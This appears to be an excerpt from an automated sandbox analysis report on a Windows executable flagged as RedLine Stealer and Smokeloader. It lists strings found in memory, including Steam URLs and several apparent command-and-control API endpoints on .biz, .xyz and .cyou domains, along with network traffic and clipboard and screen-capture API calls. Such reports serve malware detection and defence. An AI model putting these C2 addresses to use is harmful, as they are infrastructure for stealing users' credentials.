                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/4
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api2
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/tX
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/z
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1312168792.0000000000891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz:443/api0u
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725130264.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/pi
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725212264.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/tX
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000834000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356259424.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legalD
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.7:49701 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00431839

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0040B44C0_2_0040B44C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004087900_2_00408790
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004260540_2_00426054
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043B0680_2_0043B068
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004140700_2_00414070
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043C0200_2_0043C020
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004398300_2_00439830
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043D8300_2_0043D830
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041B0E10_2_0041B0E1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041F0E00_2_0041F0E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004210E00_2_004210E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004358900_2_00435890
